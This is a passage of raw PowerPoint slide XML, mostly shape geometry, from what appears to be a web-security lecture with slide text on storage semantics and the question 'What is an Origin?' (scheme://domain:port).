              <a:gd name="T14" fmla="*/ 1003952 w 1039494"/>
              <a:gd name="T15" fmla="*/ 5224 h 198755"/>
              <a:gd name="T16" fmla="*/ 1026026 w 1039494"/>
              <a:gd name="T17" fmla="*/ 19469 h 198755"/>
              <a:gd name="T18" fmla="*/ 1040907 w 1039494"/>
              <a:gd name="T19" fmla="*/ 40597 h 198755"/>
              <a:gd name="T20" fmla="*/ 1046366 w 1039494"/>
              <a:gd name="T21" fmla="*/ 66470 h 198755"/>
              <a:gd name="T22" fmla="*/ 1046366 w 1039494"/>
              <a:gd name="T23" fmla="*/ 124690 h 198755"/>
              <a:gd name="T24" fmla="*/ 1040907 w 1039494"/>
              <a:gd name="T25" fmla="*/ 150562 h 198755"/>
              <a:gd name="T26" fmla="*/ 1026026 w 1039494"/>
              <a:gd name="T27" fmla="*/ 171692 h 198755"/>
              <a:gd name="T28" fmla="*/ 1003952 w 1039494"/>
              <a:gd name="T29" fmla="*/ 185937 h 198755"/>
              <a:gd name="T30" fmla="*/ 976921 w 1039494"/>
              <a:gd name="T31" fmla="*/ 191162 h 198755"/>
              <a:gd name="T32" fmla="*/ 69439 w 1039494"/>
              <a:gd name="T33" fmla="*/ 191162 h 198755"/>
              <a:gd name="T34" fmla="*/ 42414 w 1039494"/>
              <a:gd name="T35" fmla="*/ 185937 h 198755"/>
              <a:gd name="T36" fmla="*/ 20334 w 1039494"/>
              <a:gd name="T37" fmla="*/ 171692 h 198755"/>
              <a:gd name="T38" fmla="*/ 5464 w 1039494"/>
              <a:gd name="T39" fmla="*/ 150562 h 198755"/>
              <a:gd name="T40" fmla="*/ 0 w 1039494"/>
              <a:gd name="T41" fmla="*/ 124690 h 198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39494" h="198755">
                <a:moveTo>
                  <a:pt x="0" y="129352"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="68956"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5418" y="42115"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20196" y="20196"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="42115" y="5418"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="68956" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="970073" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="996914" y="5418"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1018833" y="20196"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1033611" y="42115"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1039030" y="68956"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1039030" y="129352"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1033611" y="156193"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1018833" y="178112"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="996914" y="192890"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="970073" y="198309"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="68956" y="198309"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="42115" y="192890"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20196" y="178112"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5418" y="156193"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="129352"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln w="29467">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38" name="object 30">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1860491B-FC14-5043-BAF5-0513AD7D4992}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3073400" y="2003425"/>
            <a:ext cx="3495675" cy="198438"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 0 w 3495675"/>
              <a:gd name="T1" fmla="*/ 124690 h 198755"/>
              <a:gd name="T2" fmla="*/ 0 w 3495675"/>
              <a:gd name="T3" fmla="*/ 66470 h 198755"/>
              <a:gd name="T4" fmla="*/ 5418 w 3495675"/>
              <a:gd name="T5" fmla="*/ 40597 h 198755"/>
              <a:gd name="T6" fmla="*/ 20196 w 3495675"/>
              <a:gd name="T7" fmla="*/ 19469 h 198755"/>
              <a:gd name="T8" fmla="*/ 42115 w 3495675"/>
              <a:gd name="T9" fmla="*/ 5224 h 198755"/>
              <a:gd name="T10" fmla="*/ 68956 w 3495675"/>
              <a:gd name="T11" fmla="*/ 0 h 198755"/>
              <a:gd name="T12" fmla="*/ 3426415 w 3495675"/>
              <a:gd name="T13" fmla="*/ 0 h 198755"/>
              <a:gd name="T14" fmla="*/ 3453255 w 3495675"/>
              <a:gd name="T15" fmla="*/ 5224 h 198755"/>
              <a:gd name="T16" fmla="*/ 3475173 w 3495675"/>
              <a:gd name="T17" fmla="*/ 19469 h 198755"/>
              <a:gd name="T18" fmla="*/ 3489951 w 3495675"/>
              <a:gd name="T19" fmla="*/ 40597 h 198755"/>
              <a:gd name="T20" fmla="*/ 3495370 w 3495675"/>
              <a:gd name="T21" fmla="*/ 66470 h 198755"/>
              <a:gd name="T22" fmla="*/ 3495370 w 3495675"/>
              <a:gd name="T23" fmla="*/ 124690 h 198755"/>
              <a:gd name="T24" fmla="*/ 3489951 w 3495675"/>
              <a:gd name="T25" fmla="*/ 150562 h 198755"/>
              <a:gd name="T26" fmla="*/ 3475173 w 3495675"/>
              <a:gd name="T27" fmla="*/ 171692 h 198755"/>
              <a:gd name="T28" fmla="*/ 3453255 w 3495675"/>
              <a:gd name="T29" fmla="*/ 185937 h 198755"/>
              <a:gd name="T30" fmla="*/ 3426415 w 3495675"/>
              <a:gd name="T31" fmla="*/ 191162 h 198755"/>
              <a:gd name="T32" fmla="*/ 68956 w 3495675"/>
              <a:gd name="T33" fmla="*/ 191162 h 198755"/>
              <a:gd name="T34" fmla="*/ 42115 w 3495675"/>
              <a:gd name="T35" fmla="*/ 185937 h 198755"/>
              <a:gd name="T36" fmla="*/ 20196 w 3495675"/>
              <a:gd name="T37" fmla="*/ 171692 h 198755"/>
              <a:gd name="T38" fmla="*/ 5418 w 3495675"/>
              <a:gd name="T39" fmla="*/ 150562 h 198755"/>
              <a:gd name="T40" fmla="*/ 0 w 3495675"/>
              <a:gd name="T41" fmla="*/ 124690 h 198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95675" h="198755">
                <a:moveTo>
                  <a:pt x="0" y="129352"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="68956"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5418" y="42115"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20196" y="20196"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="42115" y="5418"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="68956" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3426415" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3453255" y="5418"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3475173" y="20196"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3489951" y="42115"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3495370" y="68956"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3495370" y="129352"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3489951" y="156193"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3475173" y="178112"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3453255" y="192890"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3426415" y="198309"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="68956" y="198309"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="42115" y="192890"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20196" y="178112"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5418" y="156193"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="129352"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln w="29467">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39" name="object 31">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{34166A40-D950-644A-B1DE-CDD7DB68707B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7213600" y="1992313"/>
            <a:ext cx="1709738" cy="200025"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 0 w 1710054"/>
              <a:gd name="T1" fmla="*/ 149761 h 198755"/>
              <a:gd name="T2" fmla="*/ 0 w 1710054"/>
              <a:gd name="T3" fmla="*/ 79838 h 198755"/>
              <a:gd name="T4" fmla="*/ 5395 w 1710054"/>
              <a:gd name="T5" fmla="*/ 48761 h 198755"/>
              <a:gd name="T6" fmla="*/ 20104 w 1710054"/>
              <a:gd name="T7" fmla="*/ 23384 h 198755"/>
              <a:gd name="T8" fmla="*/ 41931 w 1710054"/>
              <a:gd name="T9" fmla="*/ 6274 h 198755"/>
              <a:gd name="T10" fmla="*/ 68657 w 1710054"/>
              <a:gd name="T11" fmla="*/ 0 h 198755"/>
              <a:gd name="T12" fmla="*/ 1634041 w 1710054"/>
              <a:gd name="T13" fmla="*/ 0 h 198755"/>
              <a:gd name="T14" fmla="*/ 1660767 w 1710054"/>
              <a:gd name="T15" fmla="*/ 6274 h 198755"/>
              <a:gd name="T16" fmla="*/ 1682592 w 1710054"/>
              <a:gd name="T17" fmla="*/ 23384 h 198755"/>
              <a:gd name="T18" fmla="*/ 1697306 w 1710054"/>
              <a:gd name="T19" fmla="*/ 48761 h 198755"/>
              <a:gd name="T20" fmla="*/ 1702702 w 1710054"/>
              <a:gd name="T21" fmla="*/ 79838 h 198755"/>
              <a:gd name="T22" fmla="*/ 1702702 w 1710054"/>
              <a:gd name="T23" fmla="*/ 149761 h 198755"/>
              <a:gd name="T24" fmla="*/ 1697306 w 1710054"/>
              <a:gd name="T25" fmla="*/ 180834 h 198755"/>
              <a:gd name="T26" fmla="*/ 1682592 w 1710054"/>
              <a:gd name="T27" fmla="*/ 206210 h 198755"/>
              <a:gd name="T28" fmla="*/ 1660767 w 1710054"/>
              <a:gd name="T29" fmla="*/ 223321 h 198755"/>
              <a:gd name="T30" fmla="*/ 1634041 w 1710054"/>
              <a:gd name="T31" fmla="*/ 229595 h 198755"/>
              <a:gd name="T32" fmla="*/ 68657 w 1710054"/>
              <a:gd name="T33" fmla="*/ 229595 h 198755"/>
              <a:gd name="T34" fmla="*/ 41931 w 1710054"/>
              <a:gd name="T35" fmla="*/ 223321 h 198755"/>
              <a:gd name="T36" fmla="*/ 20104 w 1710054"/>
              <a:gd name="T37" fmla="*/ 206210 h 198755"/>
              <a:gd name="T38" fmla="*/ 5395 w 1710054"/>
              <a:gd name="T39" fmla="*/ 180834 h 198755"/>
              <a:gd name="T40" fmla="*/ 0 w 1710054"/>
              <a:gd name="T41" fmla="*/ 149761 h 198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10054" h="198755">
                <a:moveTo>
                  <a:pt x="0" y="129352"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="68956"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5418" y="42115"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20196" y="20196"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="42115" y="5418"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="68956" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1641001" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1667841" y="5418"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1689759" y="20196"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1704537" y="42115"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1709956" y="68956"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1709956" y="129352"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1704537" y="156193"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1689759" y="178112"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1667841" y="192890"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1641001" y="198309"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="68956" y="198309"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="42115" y="192890"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20196" y="178112"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5418" y="156193"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="129352"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln w="29467">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440" name="object 32">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{36DF3F03-4E08-854D-83FA-FE0D51474160}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6577013" y="2003425"/>
            <a:ext cx="668337" cy="177800"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 0 w 669290"/>
              <a:gd name="T1" fmla="*/ 93153 h 179069"/>
              <a:gd name="T2" fmla="*/ 0 w 669290"/>
              <a:gd name="T3" fmla="*/ 58550 h 179069"/>
              <a:gd name="T4" fmla="*/ 5238 w 669290"/>
              <a:gd name="T5" fmla="*/ 35762 h 179069"/>
              <a:gd name="T6" fmla="*/ 19545 w 669290"/>
              <a:gd name="T7" fmla="*/ 17150 h 179069"/>
              <a:gd name="T8" fmla="*/ 40757 w 669290"/>
              <a:gd name="T9" fmla="*/ 4599 h 179069"/>
              <a:gd name="T10" fmla="*/ 66733 w 669290"/>
              <a:gd name="T11" fmla="*/ 0 h 179069"/>
              <a:gd name="T12" fmla="*/ 580583 w 669290"/>
              <a:gd name="T13" fmla="*/ 0 h 179069"/>
              <a:gd name="T14" fmla="*/ 606559 w 669290"/>
              <a:gd name="T15" fmla="*/ 4599 h 179069"/>
              <a:gd name="T16" fmla="*/ 627772 w 669290"/>
              <a:gd name="T17" fmla="*/ 17150 h 179069"/>
              <a:gd name="T18" fmla="*/ 642073 w 669290"/>
              <a:gd name="T19" fmla="*/ 35762 h 179069"/>
              <a:gd name="T20" fmla="*/ 647317 w 669290"/>
              <a:gd name="T21" fmla="*/ 58550 h 179069"/>
              <a:gd name="T22" fmla="*/ 647317 w 669290"/>
              <a:gd name="T23" fmla="*/ 93153 h 179069"/>
              <a:gd name="T24" fmla="*/ 642073 w 669290"/>
              <a:gd name="T25" fmla="*/ 115943 h 179069"/>
              <a:gd name="T26" fmla="*/ 627772 w 669290"/>
              <a:gd name="T27" fmla="*/ 134557 h 179069"/>
              <a:gd name="T28" fmla="*/ 606559 w 669290"/>
              <a:gd name="T29" fmla="*/ 147104 h 179069"/>
              <a:gd name="T30" fmla="*/ 580583 w 669290"/>
              <a:gd name="T31" fmla="*/ 151705 h 179069"/>
              <a:gd name="T32" fmla="*/ 66733 w 669290"/>
              <a:gd name="T33" fmla="*/ 151705 h 179069"/>
              <a:gd name="T34" fmla="*/ 40757 w 669290"/>
              <a:gd name="T35" fmla="*/ 147104 h 179069"/>
              <a:gd name="T36" fmla="*/ 19545 w 669290"/>
              <a:gd name="T37" fmla="*/ 134557 h 179069"/>
              <a:gd name="T38" fmla="*/ 5238 w 669290"/>
              <a:gd name="T39" fmla="*/ 115943 h 179069"/>
              <a:gd name="T40" fmla="*/ 0 w 669290"/>
              <a:gd name="T41" fmla="*/ 93153 h 1790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9290" h="179069">
                <a:moveTo>
                  <a:pt x="0" y="109707"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="68956"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5418" y="42115"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20196" y="20196"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="42115" y="5418"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="68956" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="599926" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="626767" y="5418"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="648686" y="20196"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="663464" y="42115"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="668883" y="68956"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="668883" y="109707"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="663464" y="136548"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="648686" y="158467"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="626767" y="173245"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="599926" y="178664"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="68956" y="178664"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="42115" y="173245"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20196" y="158467"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5418" y="136548"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="109707"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln w="29467">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 name="object 33">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CDD9ABE3-6662-B34A-9A16-DD870AF3EB94}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4559300" y="2794000"/>
            <a:ext cx="3708400" cy="1082675"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="1318478" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2600" b="1" spc="15" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Semantics</a:t>
            </a:r>
            <a:endParaRPr sz="2600">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="12676" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="330"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2000" spc="-30" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Store </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="50" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>“us” </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="20" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>under </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>the key</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-105" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="35" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>“edition”</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="145442" name="object 34">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{36C912FE-C417-4442-BE4D-23CA7B729562}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4173538" y="4360863"/>
            <a:ext cx="5267325" cy="668337"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 0 w 5267325"/>
              <a:gd name="T1" fmla="*/ 618372 h 667385"/>
              <a:gd name="T2" fmla="*/ 0 w 5267325"/>
              <a:gd name="T3" fmla="*/ 71253 h 667385"/>
              <a:gd name="T4" fmla="*/ 5418 w 5267325"/>
              <a:gd name="T5" fmla="*/ 43519 h 667385"/>
              <a:gd name="T6" fmla="*/ 20196 w 5267325"/>
              <a:gd name="T7" fmla="*/ 20869 h 667385"/>
              <a:gd name="T8" fmla="*/ 42115 w 5267325"/>
              <a:gd name="T9" fmla="*/ 5602 h 667385"/>
              <a:gd name="T10" fmla="*/ 68956 w 5267325"/>
              <a:gd name="T11" fmla="*/ 0 h 667385"/>
              <a:gd name="T12" fmla="*/ 5197753 w 5267325"/>
              <a:gd name="T13" fmla="*/ 0 h 667385"/>
              <a:gd name="T14" fmla="*/ 5224593 w 5267325"/>
              <a:gd name="T15" fmla="*/ 5602 h 667385"/>
              <a:gd name="T16" fmla="*/ 5246511 w 5267325"/>
              <a:gd name="T17" fmla="*/ 20869 h 667385"/>
              <a:gd name="T18" fmla="*/ 5261289 w 5267325"/>
              <a:gd name="T19" fmla="*/ 43519 h 667385"/>
              <a:gd name="T20" fmla="*/ 5266708 w 5267325"/>
              <a:gd name="T21" fmla="*/ 71253 h 667385"/>
              <a:gd name="T22" fmla="*/ 5266708 w 5267325"/>
              <a:gd name="T23" fmla="*/ 618372 h 667385"/>
              <a:gd name="T24" fmla="*/ 5261289 w 5267325"/>
              <a:gd name="T25" fmla="*/ 646105 h 667385"/>
              <a:gd name="T26" fmla="*/ 5246511 w 5267325"/>
              <a:gd name="T27" fmla="*/ 668755 h 667385"/>
              <a:gd name="T28" fmla="*/ 5224593 w 5267325"/>
              <a:gd name="T29" fmla="*/ 684026 h 667385"/>
              <a:gd name="T30" fmla="*/ 5197753 w 5267325"/>
              <a:gd name="T31" fmla="*/ 689626 h 667385"/>
              <a:gd name="T32" fmla="*/ 68956 w 5267325"/>
              <a:gd name="T33" fmla="*/ 689626 h 667385"/>
              <a:gd name="T34" fmla="*/ 42115 w 5267325"/>
              <a:gd name="T35" fmla="*/ 684026 h 667385"/>
              <a:gd name="T36" fmla="*/ 20196 w 5267325"/>
              <a:gd name="T37" fmla="*/ 668755 h 667385"/>
              <a:gd name="T38" fmla="*/ 5418 w 5267325"/>
              <a:gd name="T39" fmla="*/ 646105 h 667385"/>
              <a:gd name="T40" fmla="*/ 0 w 5267325"/>
              <a:gd name="T41" fmla="*/ 618372 h 6673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7325" h="667385">
                <a:moveTo>
                  <a:pt x="0" y="598426"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="68956"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5418" y="42115"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20196" y="20196"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="42115" y="5418"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="68956" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5197753" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5224593" y="5418"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5246511" y="20196"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5261289" y="42115"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5266708" y="68956"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5266708" y="598426"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5261289" y="625267"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5246511" y="647186"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5224593" y="661964"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5197753" y="667383"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="68956" y="667383"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="42115" y="661964"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20196" y="647186"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5418" y="625267"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="598426"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln w="29467">
            <a:solidFill>
              <a:srgbClr val="C8250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AB7FBEE-EDE9-3D49-9AF3-2DC586781FAA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2544763" y="1244600"/>
            <a:ext cx="4965700" cy="776288"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr tIns="7307" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="6354">
              <a:spcBef>
                <a:spcPts val="57"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr spc="-540" dirty="0"/>
              <a:t>What </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-400" dirty="0"/>
              <a:t>is </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-495" dirty="0"/>
              <a:t>an</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-640" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-538" dirty="0"/>
              <a:t>Origin?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="146435" name="object 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6154E67D-7873-9246-A444-79A802332138}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="355600" y="3300413"/>
            <a:ext cx="9294813" cy="31130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4" name="object 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E37B4004-6756-D746-BBCF-074C1A236B9A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="496888" y="2449513"/>
            <a:ext cx="4221162" cy="488950"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="7307" rIns="0" bIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="6354">
              <a:spcBef>
                <a:spcPts val="57"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr sz="3127" b="1" spc="23" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>scheme://domain:port</a:t>
            </a:r>
            <a:endParaRPr sz="3127">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
